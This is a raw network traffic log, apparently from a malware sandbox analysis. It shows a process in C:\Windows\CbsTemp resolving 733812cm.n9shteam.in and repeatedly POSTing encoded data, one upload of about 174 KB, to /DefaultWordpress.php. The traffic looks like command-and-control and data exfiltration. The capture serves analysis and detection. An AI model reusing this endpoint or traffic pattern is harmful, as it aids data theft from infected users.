                                                          Oct 20, 2024 18:19:47.561897993 CEST8050073188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:48.004616022 CEST8050073188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:48.119007111 CEST5007380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:48.786125898 CEST8050073188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:48.912686110 CEST5007480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:48.915646076 CEST5007380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:48.917666912 CEST8050074188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:48.917783022 CEST5007480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:48.917853117 CEST5007480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:48.923024893 CEST8050074188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:49.277443886 CEST5007480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:49.284754038 CEST8050074188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:49.285063028 CEST8050074188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:49.285916090 CEST8050074188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:49.694061995 CEST8050074188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:49.853159904 CEST5007480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:49.928862095 CEST8050074188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:50.052131891 CEST5007480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.052535057 CEST5007580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.057579041 CEST8050074188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:50.057636023 CEST5007480192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.057878017 CEST8050075188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:50.057943106 CEST5007580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.058036089 CEST5007580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.063888073 CEST8050075188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:50.415762901 CEST5007580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.420787096 CEST8050075188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:50.420800924 CEST8050075188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:50.420808077 CEST8050075188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:50.831809998 CEST8050075188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:50.854392052 CEST5007580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.854396105 CEST5007680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.859538078 CEST8050076188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:50.859662056 CEST5007680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.859839916 CEST8050075188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:50.859874964 CEST5007680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.859911919 CEST5007580192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.864839077 CEST8050076188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:50.977483988 CEST5007780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.977854013 CEST5007380192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.982398033 CEST8050077188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:50.982480049 CEST5007780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.982585907 CEST5007780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:50.987687111 CEST8050077188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:51.212547064 CEST5007680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:51.217787981 CEST8050076188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:51.218364000 CEST8050076188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:51.340172052 CEST5007780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:51.345427990 CEST8050077188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:51.345453978 CEST8050077188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:51.345463037 CEST8050077188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:51.664496899 CEST8050076188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:51.712498903 CEST5007680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:51.786750078 CEST8050077188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:51.853111982 CEST5007780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:51.913064957 CEST8050076188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:52.009346008 CEST5007680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:52.014199972 CEST8050077188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:52.130633116 CEST5007680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:52.130695105 CEST5007780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:52.131247997 CEST5007880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:52.136301994 CEST8050076188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:52.136377096 CEST5007680192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:52.136934042 CEST8050078188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:52.136998892 CEST5007880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:52.137092113 CEST5007880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:52.137511015 CEST8050077188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:52.137557983 CEST5007780192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:52.142185926 CEST8050078188.114.96.3192.168.2.5
                                                          Oct 20, 2024 18:19:52.495462894 CEST5007880192.168.2.5188.114.96.3
                                                          Oct 20, 2024 18:19:52.500490904 CEST8050078188.114.96.3192.168.2.5
                                                          Timestamp | Source Port | Dest Port | Source IP | Dest IP
                                                          Oct 20, 2024 18:17:53.939482927 CEST | 52074 | 53 | 192.168.2.5 | 1.1.1.1
                                                          Oct 20, 2024 18:17:53.954286098 CEST | 53 | 52074 | 1.1.1.1 | 192.168.2.5
                                                          Timestamp | Source IP | Dest IP | Trans ID | OP Code | Name | Type | Class | DNS over HTTPS
                                                          Oct 20, 2024 18:17:53.939482927 CEST | 192.168.2.5 | 1.1.1.1 | 0xd4d2 | Standard query (0) | 733812cm.n9shteam.in | A (IP address) | IN (0x0001) | false
                                                          Timestamp | Source IP | Dest IP | Trans ID | Reply Code | Name | CName | Address | Type | Class | DNS over HTTPS
                                                          Oct 20, 2024 18:17:53.954286098 CEST | 1.1.1.1 | 192.168.2.5 | 0xd4d2 | No error (0) | 733812cm.n9shteam.in |  | 188.114.96.3 | A (IP address) | IN (0x0001) | false
                                                          Oct 20, 2024 18:17:53.954286098 CEST | 1.1.1.1 | 192.168.2.5 | 0xd4d2 | No error (0) | 733812cm.n9shteam.in |  | 188.114.97.3 | A (IP address) | IN (0x0001) | false
                                                          • 733812cm.n9shteam.in
                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          0 | 192.168.2.5 | 49772 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:17:53.977781057 CEST | 310 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 344
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:17:54.325443029 CEST | 344 | OUT | Data Raw: 00 00 01 01 03 0d 01 0b 05 06 02 01 02 06 01 0a 00 01 05 0b 02 0d 03 00 07 03 0d 54 06 02 01 07 0a 02 06 00 07 06 06 01 0c 0a 05 06 07 57 06 04 07 04 0e 0b 0e 01 04 07 07 0e 06 0d 05 00 06 0a 00 05 0f 0e 04 0f 06 52 0c 53 0b 02 0d 56 0f 07 07 50
                                                          Data Ascii: TWRSVPUR\L~kcfOcbiwfP|RSc|w\h`sY{cJzpzJhToPvgRO~e~V@Bzm~LbW
                                                          Oct 20, 2024 18:17:54.763739109 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:17:55.183435917 CEST | 1236 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:17:55 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=W79xskmutCc6I2FhVeaf5UqMTBNEEJEBhxtrW7uKPiPWLMn%2FqfcfTcKcxHbq6gJGEFqdkR5SkFmvjZTg47XtOSUsTs5XtjfsO92Shr1srWRanv9B88KLvuxHC5pj3lL2L4Wv901PXg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a521cbf6a2710-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11536&sent=2&recv=4&lost=0&retrans=0&sent_bytes=25&recv_bytes=654&delivery_rate=120295&cwnd=31&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Oct 20, 2024 18:17:55.371898890 CEST | 286 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 384
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:17:55.776500940 CEST | 670 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 384
                                                          Expect: 100-continue
                                                          Data Raw: 5b 5e 59 5f 5a 5f 51 54 54 5b 52 57 50 59 57 56 50 50 5d 5c 50 52 57 5d 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c 54 54 50 45 5a 41 53 5b 5a 51 5e 50 58 55 50 5f 5a 5d 57 52 5e 5e 5f 55 41 58 50 5a 5d 58 55 5e 5d 5e 46 53 55 5d 50 58 59 52 51 5f 58 58 59 5c 5e 52 58 5c 5e 5d 5e 5a 59 54 5c 5d 5b 5d 57 51 56 56 51 5c 5d 47 59 5b 5d 59 5f 59 52 55 59 57 5d 43 58 5c 51 53 57 43 54 5d 5d 5b 5f 5b 58 5e 5c 5f 46 51 5e 5c 09 13 20 15 3e 1d 25 5f 31 05 3e 0e 2b 20 23 5b 26 28 35 1f 3f 2e 20 1f 3e 01 0a 5d 27 04 20 01 32 57 23 5a 24 2b 26 58 27 00 2d 07 28 10 23 46 01 17 20 1b 24 07 00 50 2e 05 28 11 26 32 28 5c 24 2f 20 5c 20 03 2b 10 31 13 26 13 33 06 33 55 3d 2f 06 55 2e 3e 07 51 2d 13 38 05 2d 22 36 01 24 0d 0c 15 32 3a 39 5a 32 0d 2f 10 21 02 25 07 23 11 35 56 3a 1f 0d 02 38 01 3e 00 3e 2b 2c 16 29 03 0e 15 28 16 20 05 23 0a 20 1a 32 2d 28 0d 33 3d 13 5e 3f 31 03 11 2a 04 [TRUNCATED]
                                                          Data Ascii: [^Y_Z_QTT[RWPYWVPP]\PRW]\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ >%_1>+ #[&(5?. >]' 2W#Z$+&X'-(#F $P.(&2(\$/ \ +1&33U=/U.>Q-8-"6$2:9Z2/!%#5V:8>>+,)( # 2-(3=^?1*6V.79/8 [!(==])([#2??,?)3/[S8VT
                                                          Oct 20, 2024 18:17:56.576639891 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:17:56.797019958 CEST | 932 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:17:56 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=HdG2D38bc1kRY2W4BqQA1aiurxYPSY2PAFdsubXONj1JeeZvg5jg9Szd8iQQYfYfMcd3qdm8r2SILGMOBVXZSk7sbcAZSZSwdplCTn6wjPBm49aFsptDGcm2ADKgJzPy9CdMLk1LjA%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52281b102710-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11573&sent=6&recv=8&lost=0&retrans=0&sent_bytes=2190&recv_bytes=1324&delivery_rate=369670&cwnd=35&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 38 0d 0a 0d 10 26 12 33 01 2f 56 2a 2f 24 56 2e 3e 0f 1c 2c 2d 20 02 3a 0f 08 06 30 0a 22 5c 26 29 2d 5a 24 23 3c 07 21 5a 32 59 23 59 31 1d 2e 26 28 5e 07 12 25 04 2b 12 33 07 2a 13 34 5c 28 16 2b 06 36 27 0d 06 27 2e 2f 1e 30 2d 25 17 3e 21 29 58 28 2d 2e 50 2d 37 3e 1e 2d 5e 30 59 20 3a 22 53 03 13 25 10 29 20 3f 06 22 21 2b 5a 3c 03 34 00 3c 38 25 05 29 0a 37 58 29 3b 27 58 38 2e 32 5a 30 3c 2b 02 25 59 3f 04 25 03 27 50 30 00 24 5e 2d 0e 2f 57 04 36 5b 4f 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 98&3/V*/$V.>,- :0"\&)-Z$#<!Z2Y#Y1.&(^%+3*4\(+6''./0-%>!)X(-.P-7>-^0Y :"S%) ?"!+Z<4<8%)7X);'X8.2Z0<+%Y?%'P0$^-/W6[O0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          1 | 192.168.2.5 | 49782 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:17:56.414474010 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:17:56.760993004 CEST | 2528 | OUT | Data Raw: 5b 59 59 5e 5a 52 51 57 54 5b 52 57 50 5e 57 50 50 51 5d 5e 50 56 57 54 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [YY^ZRQWT[RWP^WPPQ]^PVWT\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ _=1(=T(3'$("<X<>3'_&2?'9$."?#F $P.4
                                                          Oct 20, 2024 18:17:57.217400074 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:17:57.586172104 CEST | 789 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:17:57 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=92FqvMADGNSm6XJktQepEyJjYpcP1%2B9RJHj2NWbI8p5XBT1bMtejHpfO5jf%2B7gHbPDprJ%2BQq6HWJwmFPpX9g21%2BrypQy0pl7kYkGf8rIkUvXrTGSoLXxbNo6sD0rcrtDECGDOIFgaQ%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a522c1fdffae7-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12574&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=122961&cwnd=58&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          2 | 192.168.2.5 | 49784 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:17:57.181180000 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 1852
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:17:57.527158976 CEST | 1852 | OUT | Data Raw: 5e 5d 59 5f 5f 5f 54 52 54 5b 52 57 50 5d 57 55 50 51 5d 5b 50 5d 57 55 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: ^]Y___TRT[RWP]WUPQ][P]WU\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#= "&8-<8&;:=.*,$3><2,'Y'-+#F $P.
                                                          Oct 20, 2024 18:17:57.956057072 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:17:58.169543028 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:17:58.321239948 CEST | 939 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:17:58 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=zkFGS9nQXzrC3v4p6%2BNijleX6dLiuvXDkVvnxHkOKgreQ1P09t9vGwjz5editynGmfK8%2BHQ%2BSTs7QRtVaRYf%2BiDbR09CiBzbkXkIFvGt2hgfmQuVbKxQhBIN4occXU1RWDoJeO913A%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a5230bac5f9f9-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=11544&sent=2&recv=5&lost=0&retrans=0&sent_bytes=25&recv_bytes=2139&delivery_rate=125705&cwnd=106&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 39 38 0d 0a 0d 10 25 03 33 01 20 0e 28 3c 2c 54 3a 10 2e 0d 3a 3e 23 5c 2e 31 29 5e 30 0a 26 59 26 5c 3a 02 32 55 37 12 35 02 0b 06 37 01 36 0c 2e 26 28 5e 07 12 25 02 3d 2c 2f 05 3e 3e 28 5e 2b 38 28 58 21 09 2b 42 27 3d 20 0c 30 3d 1b 1a 3e 32 22 03 3e 03 26 56 39 34 08 1b 39 01 2c 5a 20 10 22 53 03 13 26 02 29 30 20 12 35 32 19 5b 3c 03 23 13 2b 3b 3a 5d 3e 0d 2f 5d 29 38 3c 06 3b 04 3a 5b 27 06 28 1c 26 3f 0a 59 32 04 23 1a 30 00 24 5e 2d 0e 2f 57 04 36 5b 4f 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 98%3 (<,T:.:>#\.1)^0&Y&\:2U7576.&(^%=,/>>(^+8(X!+B'= 0=>2">&V949,Z "S&)0 52[<#+;:]>/])8<;:['(&?Y2#0$^-/W6[O0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          3 | 192.168.2.5 | 49789 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:17:57.762398958 CEST | 287 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:17:58.120415926 CEST | 2528 | OUT | Data Raw: 5b 50 59 59 5f 5f 54 51 54 5b 52 57 50 5d 57 57 50 59 5d 5a 50 52 57 5c 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [PYY__TQT[RWP]WWPY]ZPRW\\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\#) .28%T(0+^&(%W?<)<40$%+_32Z3>+:#F $P.
                                                          Oct 20, 2024 18:17:58.547938108 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:17:58.956697941 CEST | 787 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:17:58 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=Lnu6MJ5EjEp60TM9o3Ybt5OaKlAGkzhtd7SZUf75eRPgxYS1jNHEw4rMl%2BnSk3mmMLFTIWcXf7H8kroF1d%2BRFOf5XCn4ZAfcmDWVwTObt7UufZoo3M6PNsQs7evSImN1Pf%2BMNZ4qgw%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52346d4667f9-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=13087&sent=3&recv=6&lost=0&retrans=0&sent_bytes=25&recv_bytes=2815&delivery_rate=112588&cwnd=36&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID | Source IP | Source Port | Destination IP | Destination Port | PID | Process
                                                          4 | 192.168.2.5 | 49802 | 188.114.96.3 | 80 | 892 | C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:00.153618097 CEST | 289 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 174204
                                                          Expect: 100-continue
                                                          Oct 20, 2024 18:18:00.954628944 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:01.169651031 CEST | 25 | IN | HTTP/1.1 100 Continue
                                                          Oct 20, 2024 18:18:02.799654007 CEST | 800 | IN | HTTP/1.1 200 OK
                                                          Date: Sun, 20 Oct 2024 16:18:02 GMT
                                                          Content-Type: text/html; charset=UTF-8
                                                          Transfer-Encoding: chunked
                                                          Connection: keep-alive
                                                          cf-cache-status: DYNAMIC
                                                          Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v4?s=%2FNIExw1COs6yTLtsTk5T%2BbWA3Dj0GgX%2F5LKwJn%2BXUeLKkViEJQmNSozmhRjw%2BUditu8bHHEEUNLgxUq4DLRPj%2B77TGWZbSha9d6nB6W2LXQaa81UT21hlACbQkiMIINzq%2BAMEHr6Wg%3D%3D"}],"group":"cf-nel","max_age":604800}
                                                          NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800}
                                                          Server: cloudflare
                                                          CF-RAY: 8d5a52436883968e-SJC
                                                          alt-svc: h3=":443"; ma=86400
                                                          server-timing: cfL4;desc="?proto=TCP&rtt=12339&sent=29&recv=144&lost=0&retrans=0&sent_bytes=25&recv_bytes=174493&delivery_rate=112100&cwnd=61&unsent_bytes=0&cid=0000000000000000&ts=0&x=0"
                                                          Data Raw: 34 0d 0a 3f 58 5f 57 0d 0a 30 0d 0a 0d 0a
                                                          Data Ascii: 4?X_W0


                                                          Session ID: 5 | Source IP: 192.168.2.5 | Source Port: 49803 | Destination IP: 188.114.96.3 | Destination Port: 80 | PID: 892 | Process: C:\Windows\CbsTemp\tqeRXJHxPWPPoiNqjJeEYdv.exe
                                                          Timestamp | Bytes transferred | Direction | Data
                                                          Oct 20, 2024 18:18:00.180314064 CEST | 311 | OUT | POST /DefaultWordpress.php HTTP/1.1
                                                          Content-Type: application/x-www-form-urlencoded
                                                          User-Agent: Mozilla/5.0 (Windows NT 6.1; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/96.0.4664.45 Safari/537.36
                                                          Host: 733812cm.n9shteam.in
                                                          Content-Length: 2528
                                                          Expect: 100-continue
                                                          Connection: Keep-Alive
                                                          Oct 20, 2024 18:18:00.526529074 CEST2528OUTData Raw: 5b 5b 5c 5f 5f 5e 51 50 54 5b 52 57 50 5d 57 55 50 5f 5d 5a 50 52 57 5a 5c 56 5d 5e 5b 5b 5e 5a 58 52 50 5e 5f 5d 54 53 5d 5e 57 51 55 54 57 5a 51 5e 5c 50 41 5d 56 55 57 5c 56 55 55 59 53 5d 5f 56 59 47 5e 58 51 52 59 5c 46 5c 46 54 5b 5e 54 5c
                                                          Data Ascii: [[\__^QPT[RWP]WUP_]ZPRWZ\V]^[[^ZXRP^_]TS]^WQUTWZQ^\PA]VUW\VUUYS]_VYG^XQRY\F\FT[^T\TTPEZAS[ZQ^PXUP_Z]WR^^_UAXPZ]XU^]^FSU]PXYRQ_XXY\^RX\^]^ZYT\][]WQVVQ\]GY[]Y_YRUYW]CX\QSWCT]][_[X^\_FQ^\ *3*&W<;$-+Y>$3-^1"3^$Y%>5<:#F $P.
